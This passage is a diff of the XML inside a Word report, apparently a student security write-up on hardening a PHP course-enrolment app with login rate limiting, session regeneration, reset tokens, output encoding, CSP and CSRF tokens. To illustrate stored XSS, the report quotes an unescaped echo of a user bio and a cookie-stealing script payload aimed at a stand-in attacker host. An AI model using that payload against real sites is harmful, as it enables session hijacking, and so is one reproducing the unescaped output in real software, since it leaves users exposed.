-        </w:rPr>
-        <w:t xml:space="preserve"> table. Every login failure, lockout, and denial </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>returns</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the identical generic message:</w:t>
+        <w:t>Login attempts are rate-limited per identifier and per IP address (maximum 5 failed attempts in a 15-minute window), after which the account enters a 15-minute temporary lockout recorded in the account_lockouts table. Every login failure, lockout, and denial returns the identical generic message:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -3567,7 +2872,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t>Invalid credentials, or this account is temporarily locked. Please try again later.</w:t>
       </w:r>
     </w:p>
@@ -3581,43 +2893,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">This message is shown whether the identifier doesn't exist, the password is wrong, or the account happens to be locked, so an attacker cannot distinguish these cases from the response alone. Response timing is also equalised: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>password_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>verify</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>) is always executed, even when no matching user was found, by checking the submitted password against a fixed dummy hash — so a missing account does not respond measurably faster than a wrong password.</w:t>
+        <w:t>This message is shown whether the identifier doesn't exist, the password is wrong, or the account happens to be locked, so an attacker cannot distinguish these cases from the response alone. Response timing is also equalised: password_verify() is always executed, even when no matching user was found, by checking the submitted password against a fixed dummy hash — so a missing account does not respond measurably faster than a wrong password.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3636,10 +2912,10 @@
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -3650,78 +2926,46 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>Session::</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">regenerate(); // </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>session_regenerate_id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>(true)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>$_SESSION['</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>user_id</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>'] = $user['id'];</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Session::regenerate(); // session_regenerate_id(true)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>$_SESSION['user_id'] = $user['id'];</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t>$_SESSION['role']    = $user['role'];</w:t>
       </w:r>
     </w:p>
@@ -3735,61 +2979,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">A secure password-reset flow rounds out the authentication hardening: reset tokens are generated with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>random_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>bytes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">32), only their SHA-256 hash is ever stored, they expire after 30 minutes, and they are single-use (marked </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>used_at</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> on redemption). A database compromise alone therefore cannot be used to forge a working reset link.</w:t>
+        <w:t>A secure password-reset flow rounds out the authentication hardening: reset tokens are generated with random_bytes(32), only their SHA-256 hash is ever stored, they expire after 30 minutes, and they are single-use (marked used_at on redemption). A database compromise alone therefore cannot be used to forge a working reset link.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3799,17 +2989,16 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="2"/>
         <w:spacing w:before="320" w:after="160"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>5. Task 3: Web Application Defences</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
@@ -3832,10 +3021,10 @@
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -3846,44 +3035,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-        <w:t>&lt;div class="bio"&gt;&lt;?</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> echo $user['bio']</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>; ?</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>&gt;&lt;/div&gt;</w:t>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>&lt;div class="bio"&gt;&lt;?php echo $user['bio']; ?&gt;&lt;/div&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3896,25 +3056,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">A bio value </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>of  &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>script&gt;document.location='https://attacker.test/c?'+document.cookie&lt;/script&gt;  executes in the browser of every user who later views that profile, including an administrator browsing the student list — a classic stored-XSS session-theft chain.</w:t>
+        <w:t>A bio value of  &lt;script&gt;document.location='https://attacker.test/c?'+document.cookie&lt;/script&gt;  executes in the browser of every user who later views that profile, including an administrator browsing the student list — a classic stored-XSS session-theft chain.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3927,52 +3069,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Remediation: every dynamic value passed into HTML goes through a single output-encoding helper, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>e(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">), which applies </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>htmlspecialchars</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>() with ENT_QUOTES:</w:t>
+        <w:t>Remediation: every dynamic value passed into HTML goes through a single output-encoding helper, e(), which applies htmlspecialchars() with ENT_QUOTES:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -3983,61 +3089,46 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">function </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>e(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>?string $value): string {</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">    return </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>htmlspecialchars</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>($value ?? '', ENT_QUOTES, 'UTF-8');</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>function e(?string $value): string {</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    return htmlspecialchars($value ?? '', ENT_QUOTES, 'UTF-8');</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t>}</w:t>
       </w:r>
     </w:p>
@@ -4051,48 +3142,12 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>This is paired with a restrictive Content-Security-Policy response header (script-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>src</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'self', object-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>src</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'none', frame-ancestors 'none') applied globally, so that even an encoding mistake elsewhere in the codebase could not execute an injected inline script.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:t>This is paired with a restrictive Content-Security-Policy response header (script-src 'self', object-src 'none', frame-ancestors 'none') applied globally, so that even an encoding mistake elsewhere in the codebase could not execute an injected inline script.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
@@ -4122,70 +3177,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Remediation: a per-session token, generated with </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>random_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>bytes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">32) and compared using the constant-time </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>hash_equals</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>(), is required on every state-changing POST request and rotated after each successful use:</w:t>
+        <w:t>Remediation: a per-session token, generated with random_bytes(32) and compared using the constant-time hash_equals(), is required on every state-changing POST request and rotated after each successful use:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -4196,133 +3197,46 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">if </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>(!</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>Csrf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>::</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>verify($_POST['</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>csrf_token</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>'] ?? null)) {</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">    Logger::log('</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>csrf_rejected</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>', $user['email'], Logger::</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>clientIp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>(), ['form' =&gt; '</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>course_enrol</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>']);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:br/>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>if (!Csrf::verify($_POST['csrf_token'] ?? null)) {</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Logger::log('csrf_rejected', $user['email'], Logger::clientIp(), ['form' =&gt; 'course_enrol']);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
         <w:t xml:space="preserve">    $error = 'Your session expired. Please reload the page and try again.';</w:t>
       </w:r>
       <w:r>
@@ -4331,7 +3245,14 @@
           <w:sz w:val="18"/>
